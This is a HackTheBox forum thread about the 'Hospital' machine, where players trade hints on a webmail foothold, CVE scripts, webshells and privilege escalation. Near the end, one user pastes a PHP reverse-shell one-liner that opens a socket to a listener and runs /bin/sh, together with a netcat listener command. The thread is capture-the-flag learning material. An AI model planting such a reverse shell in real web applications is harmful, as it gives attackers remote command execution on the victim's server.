Official Hospital Discussion

I’m past the isolated part of the machine and in the webapp of the main machine, but none of my reverse shells are working? I can curl my main machine and see the request, but I can’t seem to get a shell working and I don’t know why.

If you use the same cve script as me, the generate fails but the inject works.

Welp, finally rooted this machine. @adr_sal and @imPankajSingh helped me through this one as the very beginning gave me issues. I’m so bad at webapps! Regardless, I learned some interesting things to help me in the future and had a lot of fun with the rest. This thing is full of rabbit holes that I don’t know whether to laugh or cry at how much time I spent following them! Either that, or they’re actual points I just don’t know how to use. Still, lots of fun. I really love the setup of this box :smiley:

1 Like

Hello guys, I’m stuck in getting the reverse shell when uploading the file to port 443 (I’ve already got the creds and log in to the webmail), could someone help me pls?

After logging in, consider carefully reading the content you have access to. Maybe it gives you a hint on how to proceed.

Its hard to say it without spoilers. But lets say there are many places where you can put the credentials into. It could help checking winpeas output with this in mind.

I did, I also found the suitable CVE. I mean, my payload when injecting to the file isn’t work. I’m sorry for my previous misunderstanding sentence.

Edit: Get the reverse shell. Just reset the machine and it will work :slight_smile:

Finally, rooted!

I enjoyed this machine! A fun box that challenges your creativity…
The user is a little bit tricky, but the root is straightforward.
p0wny shell is your friend in both user and root.

Also thanks to @WKoA.


Waouu the user was the very difficult part , but the root is so easy :slight_smile:


Yes. We could have had the user flag in some user of the linux machine instead.
It seems that all the hard work was left for the user flag.
But for sure was a fun box.

1 Like

I would love a nudge.
I can access the webmail with credentials. But I am completely stuck on what the next step should be.

I tried exploiting the vulnerability indicated in the release note, but with no luck. And didn’t find any other sub-domains that could be attacked.

Depends what vuln you are talking about but if it’s one from the mail service it’s not the one.
If it’s related to needles, you have several method to use the poc, try some others

Do what Drbrown said but add some payload in :wink:

1 Like

Thanks, I should have think of that with the message. But I am really not used to have a “social engineering” component in hackthebox machines.

1 Like

This was very interesting box with quite a few little steps needed for going forward.
Frustrating foothold, simple root. Great stuff in between had fun enumerating, researching and ultimately pwning this one.

Did you find a solution? I tried multiple webshells in this location, but nothing worked.

strangest thing - I was on the windows server, with a certain file open and as it was open I saw the user/pass of the administrator be typed out in front of me. I see only one user on the box, myself.

Hi to everyone!
I need help to solve some problems when I try to get reverse shell.
I set up my nc listner with the command : nc -lnvp 4444 but when I try to get reverse shell I got this:

nc -lnvp 4444 -v
listening on [any] 4444 …
connect to [10.10.xx.xx] from (UNKNOWN) [] 6596
sent 0, rcvd 0

nc -lnvp 4444 -v 2
listening on [any] 4444 …
invalid connection to [10.10.xx.xx] from (UNKNOWN) [] 6514

My connection was immediately dropped…

I’m used this construction, because when I try to upload file with web-shell It wasn’t success:

<?php $ip = 'your_listener_ip'; $port = your_listener_port; $sock = fsockopen($ip, $port); exec("/bin/sh -i <&3 >&3 2>&3"); ?>

Sorry for my english !

Hello Dear,
If I remember correctly it’s a windows box.
Your script looks like a Linux one based on /bin/sh

Also, what you do on the box to receive the connection on the listener please ?

8080/tcp open http Apache httpd 2.4.55 ((Ubuntu))
|_http-server-header: Apache/2.4.55 (Ubuntu)

It is ubuntu and apache web server, I know that machine is on windows, but on 8080 port linux…